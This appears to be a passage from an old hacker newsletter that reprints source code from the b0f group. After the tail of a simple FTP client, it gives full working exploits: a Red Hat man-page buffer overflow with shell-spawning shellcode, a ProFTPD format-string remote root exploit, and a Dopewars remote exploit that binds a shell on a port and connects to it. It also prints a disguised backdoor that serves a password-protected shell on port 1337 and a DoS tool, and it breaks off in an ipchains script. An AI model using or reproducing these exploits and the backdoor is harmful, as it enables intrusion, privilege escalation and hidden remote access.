                );
          exit(0);
      }
      
      ftp::set_default()
      {
        port = 21, list = 0;
      }
      
      ftp::connectto(char *host)
      {
              struct sockaddr_in sin;
      
              sin.sin_addr.s_addr = resolve(host);
              sin.sin_port = htons(port);
              sin.sin_family = AF_INET;
      
              if((ftpsock = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP)) == -1)
                      error_quit("Can't open socket: %s\n",strerror(errno));
      
              if(connect(ftpsock,(struct sockaddr *)&sin,sizeof(struct sockaddr)) == -1)
                      error_quit("Can't connect to %s.%ld: %s\n",host,port,strerror(errno));
      
          //    fcntl(ftpsock,F_SETFL,O_NONBLOCK);
      }
      
      ftp::disconnect()
      {
              sendcmd("QUIT\r\n");
              close(ftpsock);
      }
      
      ftp::login(char *user)
      {
          char *passwd;
          int gotpass = 0;
      
          if(!strcmp("ftp",user) || !strcmp("anonymous",user))
              passwd = ANON_PASS;
          else /* Prompt user for password */
              passwd = getpass("Please enter password: "),gotpass = 1;
      
          if(get_response() != 220) error_quit("No banner\n");
          sendcmd("USER %s\r\n",user);
          if(get_response() != 331) error_quit("USER %s failed\n",user);
          sendcmd("PASS %s\r\n",passwd);
          if(get_response() != 230) error_quit("PASS **** failed\n");
          if(gotpass) memset(passwd,0x0,strlen(passwd)); // zero passwd 
      }
      
      unsigned long ftp::resolve(char *name)
      {
            struct hostent *hp;
            unsigned long ip;
      
            if((ip = inet_addr(name)) == -1)
            {
              if((hp = gethostbyname(name)) == NULL)
              {
                  printf("Unable to resolve <%s>\n",name);
                  exit(-1);
              }
              memcpy(&ip,hp->h_addr,4);
            }
            return ip;
      }
      
      ftp::sendcmd(char *text, ...)
      {
          va_list va;
          char buf[1024];
      
          va_start(va,text);
          vsnprintf(buf,1024,text,va);
          va_end(va);
      
          if(buf[strlen(buf) - 1] != '\n') 
              error_quit("Send: text doesn't end with \\n");
        
          if(write(ftpsock, buf, strlen(buf)) == -1)
              error_quit("Write error: %s\n",strerror(errno));
      }
      
      int ftp::get_response()
      {
          char response[4];
          char tmp;
          int i = 0;
      
          while(read(ftpsock,(char *)&tmp,1) == 1)
          {
              response[i++] = tmp;
              if(i > 3)
              {
                  if(response[3] != ' ' || !isdigit(response[0]) || !isdigit(response[1]) || !isdigit(response[2]))
                  {
                      while(read(ftpsock,(char *)&tmp,1) == 1 && tmp != '\n');
                      i = 0;
                  }
                  else
                  {
                      response[3] =  0x0;
      //                    error_quit("Server send bad response: %s\n",response);
                      return atoi(response);
                  }
              }
          }
      }
      
      int ftp::dataconn()
      {
          int fd;
          unsigned int len = sizeof(struct sockaddr);
          struct sockaddr_in sin;
          char *a, *b;
      
          if((fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP)) == -1)
              error_quit("Can't open socket: %s\n",strerror(errno));
      
          /* Get the address from the ftpsock */
          if(getsockname(ftpsock,(struct sockaddr *)&sin,&len) == -1)
              error_quit("Getsockname failed: %s\n",strerror(errno));
          sin.sin_port = 0;
      
          if(bind(fd,(struct sockaddr *)&sin,sizeof(struct sockaddr)) == -1)
              error_quit("Can't bind to port: %s",strerror(errno));
      
          if(getsockname(fd,(struct sockaddr *)&sin,&len) == -1)
              error_quit("Getsockname failed: %s\n",strerror(errno));
      
          listen(fd,1);
      
          a = (char *)&sin.sin_addr;
          b = (char *)&sin.sin_port;
      #define UC(x) (((int)x)&0xff)
       
          sendcmd("PORT %d,%d,%d,%d,%d,%d\r\n",
                      UC(a[0]),UC(a[1]),UC(a[2]),UC(a[3]),
                      UC(b[0]),UC(b[1]));
          if(get_response() != 200) error_quit("PORT failed\n");
      
          sendcmd("TYPE I\r\n");
          if(get_response() != 200) error_quit("TYPE failed\n");
      
          return fd;
      }
      
      int ftp::get_file()
      {
          char *file;
          struct sockaddr_in sin;
          int clientfd;
          unsigned int len =sizeof(struct sockaddr);
          int fd = dataconn();
      
          if(list) // Get dirlisting
          {
              sendcmd("CWD %s\r\n",path);
              if(get_response() != 250) error_quit("%s doesn't exist\n",path);
              sendcmd("LIST -al\r\n");
          }
          else
          {
              if((file = (char *)strrchr(path,'/')))
              {
                  *file++ = 0x0;
                  sendcmd("CWD %s\r\n",path);
                  if(get_response() != 250) error_quit("%s doesn't exist\n",path);
              }else file = path;
              sendcmd("RETR %s\r\n",file); 
              if(get_response() == 550) error_quit ("%s doesn't exist",file);
          }
          
          if((clientfd = accept(fd,(struct sockaddr *)&sin,&len)) == -1)
              error_quit("Accept() failed: %s\n",strerror(errno));
          close(fd);
      
          //  fcntl(ftpsock,F_SETFL,O_NONBLOCK);
          return clientfd;
      }
      
      int ftp::put_file()
      {
          int fd = dataconn();
          struct sockaddr_in sin;
          int clientfd;
          unsigned int len = sizeof(struct sockaddr);
          char *file;
      
          if((file = (char *)strrchr(path,'/')))
          {
              *file++ = 0x0;
              sendcmd("CWD %s\r\n",path);
              if(get_response() != 250) error_quit("%s doesn't exist\n",path);
          }else file = path;
      
          sendcmd("STOR %s\r\n",file); 
          if(get_response() == 550) error_quit ("%s doesn't exist",file);
          
          if((clientfd = accept(fd,(struct sockaddr *)&sin,&len)) == -1)
              error_quit("Accept() failed: %s\n",strerror(errno));
          close(fd);
      
          //  fcntl(ftpsock,F_SETFL,O_NONBLOCK);
          return clientfd;
      }
      int ftpdecode(char *string,ftp *obj)
      {
         char *tmp;
      
         if((tmp = (char *)strchr(string,'/')))
             *tmp = 0x0, path = ++tmp;
         else return -1;
             
         if((tmp = (char *)strchr(string,':')))
             *tmp = 0x0, obj->port = atol(++tmp);
             
         if((tmp = (char *)strchr(string,'@')))
             *tmp = 0x0, host = ++tmp;
         else return -1;    
             
         user = string;
         return 0;   
      }
      
      int main(int argc,char **argv)
      {
          ftp obj;
          char c, buf[1024];
          int datafd, len, cmd = 0;
      
          obj.set_default();
          
          while((c = getopt(argc,argv,"h?lp")) != EOF)
          {
              switch(c)
              {
                  case 'h':
                  case '?': usage(argv[0]);
                            break;
                  case 'l': obj.list = 1;
                            break;
                  case 'p': cmd = 1;
                            break;
                  case 'd': cmd = 2;
                  default: error_quit("Unknown option: %c\n",c);
              }
          }
      
          if((argc - optind) != 1) usage(argv[0]);
          if(ftpdecode(argv[optind],&obj) == -1)
              error_quit("Bad user@host:port/path string\n");
      
          obj.connectto(host);
          obj.login(user);
          
          if(!cmd)
          {
              datafd = obj.get_file();
              while(len = read(datafd,buf,1024))
              {
                  if(len == -1) error_quit("Read() failed: %s\n",strerror(errno));
                  write(STDOUT_FILENO,buf,len);
                  memset(buf,0x0,1024);
              }    
          } else
          {
              datafd = obj.put_file();
              printf("[ Ready for datainput ]\n");
              while(len = read(STDIN_FILENO,buf,1024))
              {
                  if(len == -1) error_quit("Read() failed: %s\n",strerror(errno));
                  write(datafd,buf,len);
                  memset(buf,0x0,1024);
              }    
          } 
          obj.disconnect();
      
          return 0;
      }
      
      @HWA
      
31.0  Redhat 6.1 /usr/bin/man exploit. Gives egid=man by venglin (b0f)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: http://www.b0f.com/
      
      /*
       * (c) 2000 babcia padlina / b0f
       * (lcamtuf's idea)
       *
       * redhat 6.1 /usr/bin/man exploit
      */
      
      #include <stdio.h>
      #include <sys/param.h>
      #include <sys/stat.h>
      #include <string.h>
      
      #define NOP             0x90
      #define OFS             1800
      #define BUFSIZE         4002
      #define ADDRS           1000
      
      long getesp(void)
      {
         __asm__("movl %esp, %eax\n");
      }
      
      int main(argc, argv)
      int argc;
      char **argv;
      {
              char *execshell =
              "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
              "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
              "\x80\xe8\xdc\xff\xff\xff/bin/sh";
      
              char *buf, *p;
              int noplen, i, ofs;
              long ret, *ap;
      
              if(!(buf = (char *)malloc(BUFSIZE+ADDRS+1)))
              {
                      perror("malloc()");
                      return -1;
              }
      
              if (argc > 1)
                      ofs = atoi(argv[1]);
              else
                      ofs = OFS;
      
              noplen = BUFSIZE - strlen(execshell);
              ret = getesp() + ofs;
      
              memset(buf, NOP, noplen);
              buf[noplen+1] = '\0';
              strcat(buf, execshell);
      
              p = buf + noplen + strlen(execshell);
              ap = (unsigned long *)p;
      
              for(i = 0; i < ADDRS / 4; i++)
                      *ap++ = ret;
      
              p = (char *)ap;
              *p = '\0';
      
              fprintf(stderr, "RET: 0x%x  len: %d\n\n", ret, strlen(buf));
      
              setenv("MANPAGER", buf, 1);
              execl("/usr/bin/man", "man", "ls", 0);
      
              return 0;
      }
      
      
      @HWA      
      
32.0  Proftpd pre <=6 remote exploit for linuxppc by lamagra (b0f)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: http://www.b0f.com/
      
      * Although marked 'private' this was available for public download
        on the b0f site - Ed
        
        
      
      /* PRIVATE              Do  not distribute            PRIVATE
                                                        oktober 1999
      
         pro-ftpd remote exploit (linux ppc)
      
      Bug: Proftpd (<= pre6) passes user commands to snprinft().
           snprintf(argv,len,command + host + etc);
           This makes it possible to insert formatstrings.
           %n: writes the number of chars written to the location pointed to by it's 
           argument. 
      
           Stack:
              [ user argument ]
              [ other stuff ]
              [ arguments + stack of the snprintf funtion + subfunctions ]
      
          We walk to all that garbage using %u and stop at a certain possition inside
          the usercommand. At that possition is the address that will be overwritten by %n.
      
          Exploit is simple we overwrite the uid and the anonconfig. After a uid change
          by LIST. We are root :-)
      
      Exploit:      
         Linuxppc has a bad char (newline) in the address of session.anonconfig.
         This is why I overwrite DenyAll inside the config, But this area in memory
         is allocated and therefore unpredictable on a remote box. This is needed to 
         get write access on the server (within the chroot-env).
      
         o Anonymous login: you can overwrite anything in /home/ftp.
              Getting out of the chroot-enviroment is impossible since proftpd 
              doesn't use external program (to overwrite). 
              hint: use .forward in combination with a suid file.
              
         o Local login: instant root by changing permission to suid.
                  hint: SITE CHMOD 6755 <file> (is allowed in proftpd, not in wuftpd)
      
         I plugged this exploit in the ftp program, because this program doesn't have
         data-connection support. Because it's not really needed.
      
         I used this bug to get root on linuxppc but they never gave me credit for it.
      
         I made a x86 exploit too, but i don't have any rpm-addy's. Only my testing vals.
         I heard RH6.x comes with proftpd, anyone wanna let me get the addy's? mail me.
      
         Greets to grue, lockdown, DryGrain   
         by lamagra <lamagra@uglypig.org>
         
         http://lamagra.seKure.de
         http://penguin.seKure.de
      */
      
      #include <stdio.h>
      #include <sys/socket.h>
      #include <netinet/in.h>
      #include <sys/types.h>
      #include <netdb.h>
      
      #define NUM    150
      #define DEFAULT_OFFSET 0
      
      unsigned long resolve(char *);
      void usage(char *);
      void wait_msg(int);
      void ftplogin(int, char *, char *);
      void shell(int);
      
      extern char *optarg;
      extern int optind;
      
      void main(int argc, char **argv)
      {
        struct sockaddr_in addr;
        int sockfd,i;
        long port=21,*addrptr;
        char c, name[100],pass[100],buf[1024];
      
        /* SET DEFAULTS */
        
        strcpy(name,"ftp");
        strcpy(pass,"h@ck.er");
      
        while((c = getopt(argc,argv,"hn:p:c:")) != EOF)
        {
          switch(c)
          {
              case 'h':
                  usage(argv[0]);
              case 'n':
                  strncpy(name,optarg,100);
                  break;
              case 'p':
                  strncpy(pass,optarg,100);
                  break;
              case 'c':
                  port = atol(optarg);
          }
        }
      
        if((argc - optind) != 1) usage(argv[0]);
      
        bzero(&addr, sizeof(struct sockaddr_in));
        addr.sin_family = AF_INET;
        addr.sin_port = htons(port);
        addr.sin_addr.s_addr = resolve(argv[optind++]);
      
        printf("Connecting....."); 
      
        if((sockfd = socket(AF_INET,SOCK_STREAM,0)) == -1)
        {
          printf("failed\n");
          perror("socket");
          exit(-1);
        }
      
        if(connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0)
        {
          printf("failed\n");
          perror("connect");
          exit(-1);
        }
      
      #ifdef DEBUG
        sockfd = fileno(stdout);
      #endif
      
        wait_msg(sockfd);
        printf("success\n");
      
        printf("Logging in <%s>:<%s>\n",name,pass);
        ftplogin(sockfd,name,pass); 
      
        strcpy(buf,"PWD aaaa");
        /* Overwrite config to allow writing 
         * 0x0187e608: session.anon_config, bad char in 0x0187e60a
         * DenyAll is at 0x1885f01 on the box i used for testing 
         * It just fucks up the string -> DenyAll isn't found -> default is AllowAll
         */
        buf[8]  = 0x01;
        buf[9]  = 0x88;
        buf[10] = 0x5f;
        buf[11] = 0x01;
        /* session.disable_idswithing is at 0x187e5ca */
        buf[12] = 0x01;
        buf[13] = 0x87;
        buf[14] = 0xe5;
        buf[15] = 0xca;
        /* Ugly, Ugly / didn't feel like counting :-) */
        strncpy(buf+16,"%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u",NUM);
        strcpy(buf+16+NUM,"%n%n\r\n");
        write(sockfd,buf,strlen(buf));
      
          sleep(1);
      
        /* 0x0187e5cc: session.uid*/
        buf[8]  = 0x01;
        buf[9]  = 0x87;
        buf[10] = 0xe5;
        buf[11] = 0xcc;
        buf[12] = 0x01;
        buf[13] = 0x87;
        buf[14] = 0xe5;
        buf[15] = 0xce;
        write(sockfd,buf,strlen(buf));
      
        /* 0x187e5d0: session.ouid */
        buf[8]  = 0x01;
        buf[9]  = 0x87;
        buf[10] = 0xe5;
        buf[11] = 0xd0;
        buf[12] = 0x01;
        buf[13] = 0x87;
        buf[14] = 0xe5;
        buf[15] = 0xd2;
        write(sockfd,buf,strlen(buf));
      
        /* LIST switches uid to session.ouid to bind to port 20 (ftp-data - privelidged port) */
        write(sockfd,"LIST\r\n",6);
      
        /* LIST returns error "No data connection" */
        do{      
          read(sockfd,buf,sizeof(buf));
        }while(strstr(buf,"connection") == NULL);
      
        printf("Opening shell-connection\n");
        shell(sockfd);
      
        printf("THE END\n");
        close(sockfd);
      }
      
      void shell(int sockfd)
      {
        char buf[1024];
        fd_set set;
        int len;
      
        while(1)
        {
          FD_SET(fileno(stdin),&set);
          FD_SET(sockfd,&set);
          select(sockfd+1,&set,NULL,NULL,NULL);
      
          if(FD_ISSET(fileno(stdin),&set))
          {
              memset(buf,NULL,1024);
              fgets(buf,1024,stdin);
              write(sockfd,buf,strlen(buf));
          }
      
          if(FD_ISSET(sockfd,&set))
          {
              memset(buf,NULL,1024);
              if((len = read(sockfd,buf,1024)) == 0)
              {
                  printf("EOF.\n");
                  exit(-1);
              }
              
              if(len == -1)
              {
                 perror("read");
                 exit(-1);
              }
              puts(buf);
           }
         }      
      }
      
      void ftplogin(int sockfd, char *user,char *passwd)
      {
        char send[500];
      
        memset(send,NULL,500);
        snprintf(send,500,"USER %s\r\n",user);
        write(sockfd,send,strlen(send));
        wait_msg(sockfd);
       
        memset(send,NULL,500);
        snprintf(send,500,"PASS %s\r\n",passwd);
        write(sockfd,send,strlen(send));
        wait_msg(sockfd);
        return;
      }
      
      void wait_msg(int sockfd)
      {
        char c;
      
        while(read(sockfd,(char *)&c,sizeof(char)) > 0)
        {
          if(c == '\n') break;
        }
      }
      
      unsigned long resolve(char *hostname)
      {
        struct hostent *hp;
        unsigned long ip;
      
        if((ip = inet_addr(hostname)) == -1)
        {
          if((hp = gethostbyname(hostname)) == NULL)
          {
              printf("Can't resolve hostname <%s>.\n",hostname);
              exit(-1);
          }
          memcpy(&ip,hp->h_addr,4);
        }
        return ip;  
      }
      
      void usage(char *name)
      {
         printf("Usage: %s <host> [-n name] [-p pass] [-c port]\n",name);
         exit(-1);
      }
      
      
      @HWA      
      
33.0  Dopewars 1.4.4 remote exploit for server and client by lamagra (b0f)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: http://www.b0f.com/
      
      * Although marked 'private' this was available for public download
        on the b0f site - Ed
      
      
      /* PRIVATE                  Do NOT Distribute                      PRIVATE */
      #include <sys/socket.h>
      #include <sys/types.h>
      #include <netinet/in.h>
      #include <netdb.h>
      #include <stdio.h>
      
      /*
       * Dopewars by Ben Webb (Version 1.4.4 maybe older ones too).
       * This exploit will cause a shell to be created on port 46256.
       * The bug in located inside the ProcessMessage() and ExtractWordDelim()
       * functions.
       * Lamagra <lamagra@uglypig.org>
       */
      
      char hellshell[]= 
      "\x55\x89\xe5\xb2\x66\x89\xd0\x31\xc9"
      "\x89\xcb\x43\x89\x5d\xf8\x43\x89\x5d\xf4\x4b\x89"
      "\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89\x45\xf4"
      "\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\xb4\xb0\x89"
      "\x4d\xf0\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10"
      "\x89\xd0\x8d\x4d\xf4\xcd\x80\x89\xd0\x43\x43\xcd"
      "\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9\xb2\x3f"
      "\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\x89\xd0\x41"
      "\xcd\x80\xc7\x45\xe8\x2f\x62\x69\x6e\x66\xc7\x45"
      "\xec\x2f\x73\xc6\x45\xee\x68\x31\xc9\x88\x4d\xef"
      "\xb0\x0b\x8d\x5d\xe8\x89\x5d\xe0\x8d\x4d\xe0\x31"
      "\xd2\x89\x55\xe4\xcd\x80";
      
      char jmpcode[]="\xeb\x0d";
      
      int  shell(unsigned long);
      void transfer(char *, int);
      void do_expl(int,int,long);
      unsigned long resolve(char *);
      
      
      main(int argc, char **argv)
      {
        int time,offset=0,client,fd;
        struct sockaddr_in addr, clientaddr;
        long eip = 0xbffff620;
        
        if(argc < 2)
        {
          printf("Usage: %s {[-b] [offset]} {[hostname] [offset]}\n",argv[0]);
          exit(-1);
        }
      
        if(argc > 2)
        {
          if(!strncmp(argv[2],"0x",2)) eip = strtoul(argv[2],0,0);
          else offset = atoi(argv[2]);
        }
      
        fd = socket(AF_INET,SOCK_STREAM,0);
        addr.sin_family = AF_INET;
        addr.sin_port   = htons(7902);
      
        if(strcmp(argv[1],"-b"))
        {
           addr.sin_addr.s_addr = resolve(argv[1]); 
      
           for(time = 0;time < 20;time++)
           {
              /* Connect to server */  
      
              while(connect(fd,(struct sockaddr *)&addr,sizeof(struct sockaddr)) == -1)
              {
                      perror("can't connect to server");
                      memset(addr.sin_zero,NULL,sizeof(addr.sin_zero));
                      sleep(20);
              }
      
              do_expl(fd,offset,eip);
              sleep(1);
              shell(addr.sin_addr.s_addr);
              offset += 100; /* increase offset and try again */
           }
        }
        else{
              /* bind to 7902 and wait for a client */
              addr.sin_addr.s_addr = INADDR_ANY;
              if(bind(fd,(struct sockaddr *)&addr,16) == -1)
              {
                  perror("bind");
                  exit(-1);
              }
              listen(fd,5);
              bzero((char*)&clientaddr,sizeof(struct sockaddr_in));
              client = accept(fd,&clientaddr,16);
              do_expl(client,offset,eip);
              sleep(1);
              shell(clientaddr.sin_addr.s_addr);
        }
        close(fd);
      }
      
      void do_expl(int fd,int offset, long addy)
      {
        char buf[1024],*sploit;
        char nops[213];
        int x;
        long *addr_ptr;
      
        /* check eip for 0x0 */
        if(!(addy+offset & 0xff) || !(addy+offset & 0xff00) || !(addy+offset & 0xff0000) || !(addy+offset & 0xff000000))
        { 
          printf("NULL detected in address\n");
          offset += 1;
        }
      
      
        sploit = nops;
        for(x = 0;x < 200 - strlen(jmpcode);x++)
              *(sploit++) = 0x90;
      
        for(x = 0;x < strlen(jmpcode);x++)
          *(sploit++) = jmpcode[x];
      
        printf("Using address: 0x%x\n",addy+offset);
        addr_ptr = (long *)(sploit++);
        for(x = 0; x < 12;x+=4)
          *(addr_ptr++) = addy + offset;
      
        sprintf(buf,"%s^%s^%s\n",nops,nops, hellshell);
        write(fd,buf,strlen(buf));
      }
      
      int shell(unsigned long addy)
      {
        char buf[1024];
        fd_set set;
        int len,sockfd;
        struct sockaddr_in addr;
      
        addr.sin_family = AF_INET;
        addr.sin_port   = htons(46256);
        addr.sin_addr.s_addr   = addy;
      
        sockfd = socket(AF_INET,SOCK_STREAM,0);
        if(connect(sockfd,(struct sockaddr *)&addr,sizeof(struct sockaddr)) == -1)
        {
          perror("Sploit failed, connect");
          close(sockfd);
          return -1;
        }
        strcpy(buf,"cd /;id;echo \"hehe success, don't do anything nasty\"\n");
        write(sockfd,buf,strlen(buf));
      
        while(1)
        {
          FD_SET(fileno(stdin),&set);
          FD_SET(sockfd,&set);
          select(sockfd+1,&set,NULL,NULL,NULL);
      
          if(FD_ISSET(fileno(stdin),&set))
          {
              memset(buf,NULL,1024);
              fgets(buf,1024,stdin);
              write(sockfd,buf,strlen(buf));
          }
      
          if(FD_ISSET(sockfd,&set))
          {
              memset(buf,NULL,1024);
              if((len = read(sockfd,buf,1024)) == 0)
              {
                  printf("EOF.\n");
                  close(sockfd);
                  exit(-1);
              }
              
              if(len == -1)
              {
                 perror("read");
                 exit(-1);
              }
              puts(buf);
           }
         }      
      }
      
      unsigned long resolve(char *name)
      {
        struct hostent *hp;
        unsigned long ip;
      
        if((ip = inet_addr(name)) == -1)
        {
          if((hp = gethostbyname(name)) == NULL)
          {
              printf("Unable to resolve <%s>\n",name);
              exit(-1);
          }
          memcpy(&ip,hp->h_addr,4);
        }
        return ip;
      }
      
      @HWA      

34.0  Simple Backdoor. Shell on a port with password support by eth0 (b0f)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: http://www.b0f.com/
      
        * Although marked 'private' this was available for public download
        on the b0f site - Ed
    
      
      /* private backdoor for b0f */
      /* coded by eth0 */
      #include <stdio.h>
      #include <stdlib.h>
      #include <errno.h>
      #include <strings.h>
      #include <netinet/in.h>
      #include <sys/socket.h>
      #include <sys/types.h>
      #include <signal.h>
      #define PASSAUTH 1 /* undefine this is you won't want a password at the beginning */
      
      #define PORT            1337 /* define this to whatever you want */
      #define MSG_WELCOME     "[b0f] backd00r, remember that all commands are followed by a ;\n"
      #define MSG_PASSWORD    "Password: "
      #define MSG_WRONGPASS   "Invalid password\n"
      #define MSG_OK          "Welcome...\n"
      #define MSG_CONTINUE    "Do you want to continue?\n"
      
      #define HIDE            "-bash"
      #define SHELL           "/bin/sh"
      
      #ifdef PASSAUTH
              #define PASSWD "app910h"
      #endif
      
      int main (int argc, char *argv[]);
      #ifdef PASSAUTH
      int login (int);
      #endif
      
      int background()
      {
      int pid;
      signal(SIGCHLD,SIG_IGN);
      pid = fork();
      if(pid>0) 
      {
      sleep(1);
      exit(EXIT_SUCCESS);     // parent, exit
      }
      if(pid==0)
      {
      signal(SIGCHLD,SIG_DFL);
      return getpid();                // child, go on
      }
      return -1;                      // fork failed
      }
      
      int
      main (int argc, char *argv[])
      {
              int sockfd, newfd, size;
              struct sockaddr_in local;
              struct sockaddr_in remote;
              char cmd[256];
      
              strcpy (argv[0], HIDE);
              signal (SIGCHLD, SIG_IGN);
      
              bzero (&local, sizeof(local));
              local.sin_family = AF_INET;
              local.sin_port = htons (PORT);
              local.sin_addr.s_addr = INADDR_ANY;
              bzero (&(local.sin_zero), 8);
      
              if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
                      perror("socket");
                      exit(1);
              }
      
              if (bind (sockfd, (struct sockaddr *)&local, sizeof(struct sockaddr)) == -1) {
                      perror("bind");
                      exit(1);
              }
      
              if (listen(sockfd, 5) == -1) {
                      perror("listen");
                      exit(1);
              }
              size = sizeof(struct sockaddr_in);
              background();
              while (1) {
                      if ((newfd = accept (sockfd, (struct sockaddr *)&remote, &size)) == -1) {
                              perror ("accept");
                              exit(1);
                      } 
      
                      if (!fork ()) {
                              send (newfd, MSG_WELCOME, sizeof(MSG_WELCOME), 0);
      
      #ifdef PASSAUTH
                              if (login(newfd) != 1) {
                                      send (newfd, MSG_WRONGPASS, sizeof(MSG_WRONGPASS), 0);
                                      close (newfd);
                                      exit(1);
                              }
      #endif
      
                              close (0); close(1); close(2);
                              dup2 (newfd, 0); dup2(newfd, 1); dup2(newfd, 2);
                              execl (SHELL, SHELL, (char *)0); close(newfd);
      exit(0);
                      }
                      close (newfd);
              }
              return 0;
      }
      
      #ifdef PASSAUTH
      int
      login (int fd)  
      {
              char u_passwd[15];
              int i;
      
              send (fd, MSG_PASSWORD, sizeof(MSG_PASSWORD), 0);
              recv (fd, u_passwd, sizeof(u_passwd), 0);
      
              for (i = 0; i < strlen (u_passwd); i++) {
                      if (u_passwd[i] == '\n' || u_passwd[i] == '\r')
                      u_passwd[i] = '\0';
              }
      
              if (strcmp (PASSWD, u_passwd) == 0) {
                      return 1;
              } else {
                      return 0;
              }
      }
      #endif
      
      
      
      @HWA      
      
35.0  Pirch98 ident/fserve daemon DoS attack. by eth0 (b0f)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: http://www.b0f.com/
      
      /* code by eth0 from buffer0verfl0w security */
      /* http://www.b0f.com */
      
      /* 
         *NOTE* code was not tested, this was only coded with the information
                given by Chopsui-cide/MmM '00, use at your own risk
         *NOTE*
      
      Pirch98 ident/fserve daemon DoS attack
       Feb, 20 2000 - 00:05
       contributed by: Chopsui-cide
      
       Pirch98 irc client can be trivially crashed by a simple overflow if
      either the fserve, or ident daemons are active. 
      */
      #include <stdio.h>
      #include <string.h>
      #include <netdb.h>
      #include <netinet/in.h>
      #include <sys/types.h>
      #include <sys/socket.h>
      #include <unistd.h>
      
      #define dport 113 
      #define LEN 512
      int x, s;
      char *str;  /* varying the size would give diff results */
      
      struct sockaddr_in addr, spoofedaddr;
      struct hostent *host;
      
      
      int open_sock(int sock, char *server, int port) {
           struct sockaddr_in blah;
           struct hostent *he;
           bzero((char *)&blah,sizeof(blah));
           blah.sin_family=AF_INET;
           blah.sin_addr.s_addr=inet_addr(server);
           blah.sin_port=htons(port);
      
      
          if ((he = gethostbyname(server)) != NULL) {
              bcopy(he->h_addr, (char *)&blah.sin_addr, he->h_length);
          }
          else {
               if ((blah.sin_addr.s_addr = inet_addr(server)) < 0) {
                 perror("gethostbyname()");
                 return(-3);
               }
          }
      
              if (connect(sock,(struct sockaddr *)&blah,16)==-1) {
                   perror("connect()");
                   close(sock);
                   return(-4);
              }
              printf("Connected to [%s:%d].\n",server,port);
              return;
      }
      
      
      int main(int argc, char *argv[]) {
      
           if (argc != 2) {
              printf("Usage: %s <target>\n",argv[0]);
              exit(0);
           }
      
           if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
              perror("socket()");
              exit(-1);
           }
      
           open_sock(s,argv[1],dport);
      
      
             printf("Sending crash....\n ");
             send(s,str,LEN,0);
             printf("1st crash sent...\n");
             printf("Sending crash....\n");
             send(s,str,LEN,0);
             printf("2nd crash sent...\n");
             printf("Sending crash.... \n");
             send(s,str,LEN,0);
             printf("3rd crash sent...\n");
            
             usleep(100000);
           printf("Done!\n");
           close(s);
      return(0);
      }
      
      @HWA      
      
36.0  Simple ipchains frontend script  by eth0 (b0f)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      ipchains is a kernel level firewall application for linux.
      
      Source: http://www.b0f.com/
      
      
      #!/bin/sh
      #xxxxxxxxxxxxxxxxxxxxxxxxxxxx
      # buffer0verfl0w security...x
      #     // eth0               x
      #xxxxxxxxxxxxxxxxxxxxxxxxxxxx
      
      # Simple ipchains frontend script to help you configure ipchains
      # for standalone... 
      # usage: simply run...
      
      # ---------------------------------------------------------------- Interfaces -
      # Local Interface
      # This is the interface that is your link to the world
      
      LOCALIF="ppp0"
      
      # ------------------------------------------------------- Variable definition -
      #
      # Set the location of ipchains.
      
      IPCHAINS="/sbin/ipchains"
      
      # You shouldn't need to change anything in the rest of this section
      
      LOCALIP=`ifconfig $LOCALIF | grep inet | cut -d : -f 2 | cut -d \  -f 1`
      LOCALMASK=`ifconfig $LOCALIF | grep Mask | cut -d : -f 4`
      LOCALNET="$LOCALIP/$LOCALMASK"
      
      echo "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
      
      
      echo "[standalone] IP: $LOCALNET"
      
      
      REMOTENET="0/0"
      
      # -------------------------------------- Flush everything, start from scratch -
      
      echo -n "[standalone] Flushing rulesets.."
      
      # Incoming packets from the outside network
      $IPCHAINS -F input
      echo -n "."
      
      # Outgoing packets from the internal network
      $IPCHAINS -F output   
      echo -n "."
      
      echo "Done!"
      
      # -------------------------------------------------- Allow loopback interface -
      
      echo -n "[standalone] Loopback.."
      
      $IPCHAINS -A input -i lo -s 0/0 -d 0/0 -j ACCEPT
      $IPCHAINS -A output -i lo -s 0/0 -d 0/0 -j ACCEPT
      echo -n ".."
      
